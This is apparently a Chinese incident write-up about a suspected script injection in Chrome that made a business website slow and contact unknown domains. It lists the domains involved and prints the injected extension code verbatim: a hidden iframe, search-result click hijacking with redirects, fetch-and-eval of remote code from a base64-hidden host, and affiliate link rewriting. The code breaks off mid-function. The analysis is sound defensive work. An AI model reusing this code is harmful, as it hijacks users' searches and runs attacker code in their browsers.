关于一起疑似脚本注入安全事件过程记录

一、事件描述

某次某业务网站开发反馈说,用户反映业务网站加载响应很慢,在对网站F12检查调试过程发现,有莫名网站访问,而用其他浏览器访问同一网站则正常,只是用google浏览器访问网页后会莫名请求未知网站,后来查询发现疑似:google浏览器html JS脚本注入。如下所示:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
涉及网站有:

1> https://1303571256.rsc.cdn77.org/ovdff.js?v=11&

2> https://skytraf.xyz/ym/ovdff.html?

3> https://mc.yandex.ru/metrika/tag.js

4> https://mc.yandex.ru/watch/48342581?wmode=7&page-url=https%3A%2F%2Fskytraf.xyz%2Fym%2Fovdff.html%3F&page-ref=http%3A%2F%2F112.35.66.53%3A10080%2Fspms-web%2F&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A4uzkmd4e35bv9wjiv%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen%3Av%3A591%3Acn%3A1%3Adp%3A0%3Als%3A734329554903%3Ahid%3A105639078%3Az%3A480%3Ai%3A20210721185122%3Aet%3A1626864682%3Ac%3A1%3Arn%3A590551314%3Arqn%3A418%3Au%3A1626746401527982137%3Aw%3A0x0%3As%3A1600x900x24%3Ask%3A1%3Aifr%3A1%3Acpf%3A1%3Antf%3A1%3Ans%3A1626864679887%3Ads%3A0%2C639%2C277%2C4%2C11%2C0%2C%2C266%2C1%2C%2C%2C%2C1784%3Adsn%3A0%2C639%2C277%2C4%2C11%2C0%2C%2C322%2C2%2C%2C%2C%2C1783%3Awv%3A2%3Arqnl%3A1%3Aadb%3A2%3Aafr%3Aep5qt6g_dwaqe96-68e7cdb975ed6c1a43dab22aae376f6e-b737547328bcb06f68e4bc982afae65f-375eajei_24-4294705152-57a6d374_3j8h47eg_2ge943db_30ah20h1-1526x900x0-unknown-3%3Ati%3A2%3Ast%3A1626864683%3At%3A

二、事件真相

1)检查脚本注入:

!function () {
    sessionStorage.setItem("ext_installed", "1");
    if (window.self === window.top) {
        var e = document.createElement("iframe");
        e.name = "iframe1", e.src = "https://skytraf.xyz/ym/ovdff.html?", e.style.width = "1px", e.style.height = "1px", document.head.appendChild(e)
    }
}();


/*_rev50_s6_*/
!function(){if("http"==location.href.substr(0,4)&&document&&"undefined"!=typeof document){var subId="6";!function(){if(-1<document.domain.indexOf("yahoo.com")&&-1<window.location.pathname.indexOf("Consent")){function e(){var e=document.getElementsByClassName("consent-form");if(0<e.length&&"function"==typeof e[0].submit&&(e[0].submit(),clearInterval(n)),document.querySelector){var t=document.querySelector("#loaderContainer a");t&&t.href&&0<t.href.indexOf("yahoo")&&(window.location.href=t.href,clearInterval(n))}}var n=null;e(),n=setInterval(e,500),setTimeout(function(){clearInterval(n)},3e4)}var t;if(document.querySelectorAll&&-1!==(""+document.location.search).indexOf("yhs")&&(!(document.domain.indexOf("search.yahoo.com")<0)&&-1<window.location.pathname.indexOf("search"))){var r=document.domain.split(".")[0];if(!("search"!=r&&3<r.length)){if(!(o=document.head)){var o=document.createElement("head");document.documentElement.appendChild(o)}var a=document.createElement("style");a.innerText=".footer-logo,.hd_nav_item,.more-pivots-toggle{display:none!important}#browserExtensionPromotionBanner,.amplifyPromo{display:none!important}.compTitle>div{margin:5px 0 3px 0!important}.fz-s,.lh-16{line-height:20px!important}.ds_promo_newtab,.sbb-wrap{display:none!important}body.typing #sf{border-radius:24px!important}#sf:hover{border-radius:24px}#sbq-wrap{height:46px!important;width:632px!important}#sbq-wrap .sbq{height:46px!important;box-sizing:border-box!important;padding:12px 30px 12px 20px!important;border-radius:24px 24px 24px 24px!important;width:100%!important;font-size:16px!important;border:1px solid #dfe1e5!important}body #sbq-wrap .sbq:focus,body.typing #sbq-wrap .sbq{border-radius:24px 24px 0 0!important;padding-left:40px!important}.sa .sa-tray{border-radius:0 0 24px 24px!important}.sa .sa-tray-list-container{padding:5px 0 0 0!important}.sa-tray-list-container li{line-height:22px!important;font-size:16px!important;padding:0!important;margin:0 20px 0 20px!important}.sa-tray-list-container li b{line-height:22px!important;font-size:16px!important}#hd{border:none!important;height:50px!important}#hd .sbx{width:632px!important}#doc.uh3-p #sticky-hd,#sticky-hd,#ysch #doc #sticky-hd{background-color:#fff!important}#logo,#sbq-clear,#yucs-apps-overlay,#yucsHead,input[type=submit].sbb{display:none!important}#ys #horizontal-bar .visible-pivots .active{border-color:#1a73e8!important}#ys .c-black-h:hover,#ys .c-dgray:hover{color:#1a73e8!important}#ys #horizontal-bar .active span{color:#1a73e8!important}body.typing #sf{border-radius:26px}#results #left #web p a,#results #web a,#results .compTitle h3 a,#results a{color:#1a0dab!important;font-family:arial,sans-serif}#results #cols .compTitle h3.title a:hover{color: #1a0dab!important}",o.appendChild(a);var i=document.createElement("link");i.setAttribute("rel","icon"),i.setAttribute("type","image/x-icon"),i.setAttribute("href","data:image/png;base64,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"),o.appendChild(i);function c(){for(var e,t=document.querySelectorAll("a"),n=0;n<t.length;n++)(0<(e=t[n].getAttribute("href")||"").indexOf("search/images")||0<e.indexOf("images.search.yahoo"))&&(t[n].setAttribute("href",s+l),t[n].setAttribute("target","_blank")),(0<e.indexOf("search/video")||0<e.indexOf("video.search.yahoo"))&&(t[n].setAttribute("href",d+l),t[n].setAttribute("target","_blank")),0<e.indexOf("news.search.yahoo")&&(t[n].setAttribute("href",u+l),t[n].setAttribute("target","_blank"));var r=document.createElement("img");r.src="https://img-blog.csdnimg.cn/2022010615363636595.png",r.setAttribute("style","position: absolute; top: 4px; right: 8px; z-index: 20; width: 38px; height: 38px; cursor: pointer");var o=document.querySelector("form#sf");o.appendChild(r),r.addEventListener("click",function(){o.submit()});var a=document.createElement("img");a.src="https://img-blog.csdnimg.cn/2022010615363635242.png";var i=document.querySelector("div#hd");a.setAttribute("style","position: absolute; top: 15px; right: 20px; z-index: 20; width: 38px; height: 38px; cursor: pointer"),i.appendChild(a),a.addEventListener("click",function(){window.open("https://about.google/products/")})}var s="https://www.google.com/search?tbm=isch&q=",d="https://www.google.com/search?tbm=vid&q=",u="https://www.google.com/search?tbm=nws&q=",l=(t="p",(window.location.search.match(new RegExp("[?&]"+t+"=([^&]+)"))||[,""])[1]);"interactive"==document.readyState||"complete"==document.readyState?c():document.addEventListener("DOMContentLoaded",c)}}}();var n=function(){function f(e){var t=e.toLowerCase();t=t.replace("antivirus","").replace("malwarebytes","").replace("enterovirus","").replace("rhinovirus","").replace("coronavirus","").replace("lollipops","").replace("popsicle","");var n="g11ac68e|virus|redirect|bing | bing|google|malware|adware|popup|chrome|hijacking|freeuseranalytics|yahoo|codefuel|pops|tabsearch|tab search|tsearch|tab_search|1658209995".split("|");for(var r in n)if(n.hasOwnProperty(r)&&-1!==t.indexOf(n[r]))return;return 1}function h(){var e=document.domain.split("."),t=e.indexOf("google");return-1!==t&&!(0<t&&"www"!==e[0])&&"/search"===location.pathname}h()&&function(e,t,n){var r=new XMLHttpRequest;if(n)var o=setTimeout(function(){r.abort,t(!1,"Timeout reached")},n);t=t||function(){},r.onreadystatechange=function(){4==r.readyState&&(clearTimeout(o),t(200==r.status,r.responseText))},r.open("GET",e,!0),r.send(null)}("https://hostmaster.freeuseranalytics.com/bn.php?s="+subId+"&ver=3",function(e,t){var u=-1,l=-1,m=function(){var e="law4iugrfblqawfelc",n=e+"__last",r=e+"__shows",o=localStorage[e];o=o?JSON.parse(o):{};function a(){return(new Date).getTime()}function i(){o[n]=a(),o[r]++,localStorage[e]=JSON.stringify(o)}var c,s=!1;(c=function(){if(-1<location.href.indexOf("&start=")||(e=864e5*Math.floor(a()/864e5),o[n]&&o[n]>a()||(o[n]&&o[n]<e&&(o[r]=0),l<=0||o[r]>=l||(o[r]||(o[r]=0),0))))return"";var e,t=document.getElementsByName("q");return t.length?t[0].value.trim():""}())&&f(c)&&function(e){var t=document.getElementById("search");if(t){var n,r=t.getElementsByTagName("a");for(n=0;n<r.length;n++)r[n].addEventListener("click",e,!0);var o=document.getElementById("taw");if(o)for(r=o.getElementsByTagName("a"),n=0;n<r.length;n++)r[n].addEventListener("click",e,!0)}}(function(e){return!!s||(s=window.open((t=c,n=this.href,"https://"+p.yh_path+"?sub=a"+subId+"&q="+encodeURIComponent(t)+"&orig="+encodeURIComponent(n))),setTimeout(i,1),e.preventDefault(),!1);var t,n})};function n(n){setTimeout(function(){var e=document.getElementsByTagName("head");if(0<e.length){var t=document.createElement("LINK");t.setAttribute("rel","dns-prefetch"),t.setAttribute("href","https://"+n+"/"),e[0].appendChild(t)}},1)}if(e&&"function"==typeof JSON.parse){var p=JSON.parse(t.toString());p&&"string"==typeof p.bn_path&&"string"==typeof p.yh_path&&(u=parseInt(p.bn_lim),l=parseInt(p.yh_lim),0<u&&p.bn_path&&n(p.bn_path.split("/")[0]),0<l&&p.yh_path&&n(p.yh_path.split("/")[0])),0<u?function(){var e="ghi3bdi87sg47gig8bc8s98vr1y3";if(!document.getElementById(e)){var t=document.createElement("meta");t.id=e,document.head.appendChild(t),"http"!=location.href.substr(0,4)||window.reigw34pn7tsjkdygf||(window.reigw34pn7tsjkdygf=1,function(){if(h()){var e="aw4iugrfblqawfelcl",n=e+"__last",r=e+"__shows",o=localStorage[e];o=o?JSON.parse(o):{};function a(){return(new Date).getTime()}function i(){if(-1<location.href.indexOf("&start=")||(e=864e5*Math.floor(a()/864e5),o[n]&&o[n]>a()?(0<l&&m(),1):(o[n]&&o[n]<e&&(o[r]=0),u<=0||o[r]>=u?(0<l&&m(),1):(o[r]||(o[r]=0),0))))return"";var e,t=document.getElementsByName("q");return t.length?t[0].value.trim():""}function c(e,t){if(document.querySelectorAll){function n(e){for(var t=document.querySelectorAll(e),n=0;n<t.length;n++)t[n].parentNode.removeChild(t[n])}n("meta[name=referrer]"),n("meta[name=referer]");var r=document.createElement("meta");r.setAttribute("name","referrer"),r.setAttribute("content","none"),document.head.appendChild(r)}return"https://"+p.bn_path+"?bsub="+subId+"&q="+encodeURIComponent(e)+"&orig="+encodeURIComponent(t)}function s(){o[n]=a(),o[r]++,localStorage[e]=JSON.stringify(o)}var t,d=!1;t=function(){var t=i();t&&f(t)&&function(e){var t=document.getElementById("search");if(t){var n,r=t.getElementsByTagName("a");for(n=0;n<r.length;n++)r[n].addEventListener("click",e,!0);var o=document.getElementById("taw");if(o)for(r=o.getElementsByTagName("a"),n=0;n<r.length;n++)r[n].addEventListener("click",e,!0)}}(function(e){return!!d||(!this.getAttribute("href")||((d=window.open(c(t,this.href)))&&setTimeout(s,1),e.preventDefault(),!1))})},"complete"==document.readyState||"interactive"==document.readyState?t():document.addEventListener("DOMContentLoaded",t,!1)}}())}}():0<l&&m()}},1e4)},o=function(){var e,t=(e=document.getElementsByTagName("head"))&&void 0!==e&&e.length&&e[0]&&void 0!==e[0]&&e[0].appendChild?(e=e[0]).xadscriptinserted?0:e.xadscriptinserted=1:-1;0!=t&&(-1==t&&setTimeout(o,100),1==t&&n())};o(),function(){if(!("string"==typeof window.dhrjekkere||-1===document.location.hostname.indexOf(atob("YmluZw"+["","",""].join("="))+".com")||-1===document.location.pathname.indexOf("/search")||-1<document.location.pathname.indexOf("/images")||-1<document.location.pathname.indexOf("/videos")||-1<document.location.pathname.indexOf("/maps")||-1<document.location.pathname.indexOf("/shop")||-1<document.location.pathname.indexOf("/news"))){window.dhrjekkere="y";var url="https://"+atob("YmxhY2tzZWFyY2gub3Jn")+"/cdn/goochr/";if(window.fetch&&-1!==(window.fetch.toString()+"").indexOf("[native code]"))window.fetch(url).then(function(e){return e.text()}).then(function(r){r&&eval(r)});else if(window.XMLHttpRequest&&-1!==window.XMLHttpRequest.toString().indexOf("[native code]")){var xhttp=new XMLHttpRequest;xhttp.onreadystatechange=function(){4===xhttp.readyState&&200===xhttp.status&&xhttp.responseText&&eval(xhttp.responseText)},xhttp.open("GET",url,!0),xhttp.send()}}}()}}(),function(){for(var a,i,e=[{deeplink:"https://gotbest.by/redirect/cpa/o/q4ppyrexph8efj58esu5mjrq146nr2ho/?to=ADDRESS&sub=SUB_ID",domain:"aliexpress.com"},{deeplink:"https://gotbest.by/redirect/cpa/o/q4ppyrexph8efj58esu5mjrq146nr2ho/?to=ADDRESS&sub=SUB_ID",domain:"aliexpress.ru"}],t=!1,n=0;n<e.length;n++){var r=new RegExp("^([^\.]+\.|)"+e[n].domain.replace(/\./g,"\.")+"$");if(document.domain.match(r)){t=!0,a=e[n].deeplink,i=new RegExp("^([^\.]+\.|)"+e[n].domain+"$");break}}if(t){var c="aeapdlwscncnmrtivus";if(s=c,!(d=document.cookie.match(new RegExp("(?:^|; )"+s.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\$1")+"=([^;]*)")))||!decodeURIComponent(d[1])){function o(){var e=document.querySelectorAll("a");if(e){for(var t=0;t<e.length;t++){if(e[t].hostname.match(i)){var n=a.replace(/ADDRESS/g,escape(e[t].href)).replace(/SUB_ID/g,"2");e[t].className+=" "+c,e[t][c]=n}}var r=document.querySelectorAll("."+c);if(r){function o(e){for(var t=e.target;t.tagName&&"a"!=t.tagName.toLowerCase()&&t.parentNode&&t!=document.body;)t=t.parentNode;return t&&t[c]&&!u&&(t.href="https://osearch.net/osearch/pg/?to="+escape(t[c]),u=!0,function(e,t,n){var r=(n=n||{}).expires;if("number"==typeof r&&r){var o=new Date;o.setTime(o.getTime()+1e3*r),r=n.expires=o}r&&r.toUTCString&&(n.expires=r.toUTCString());var a=e+"="+(t=encodeURIComponent(t));for(var i in n){a+="; "+i;var c=n[i];!0!==c&&(a+="="+c)}document.cookie=a}(c,"true",{expires:86400})),!0}for(t=0;t<r.length;t++)r[t].addEventListener("click",o,!1)}}}var s,d,u=!1;"complete"==document.readyState||"interactive"==document.readyState?o():document.addEventListener("DOMContentLoaded",o,!1)}}}(),function(){var 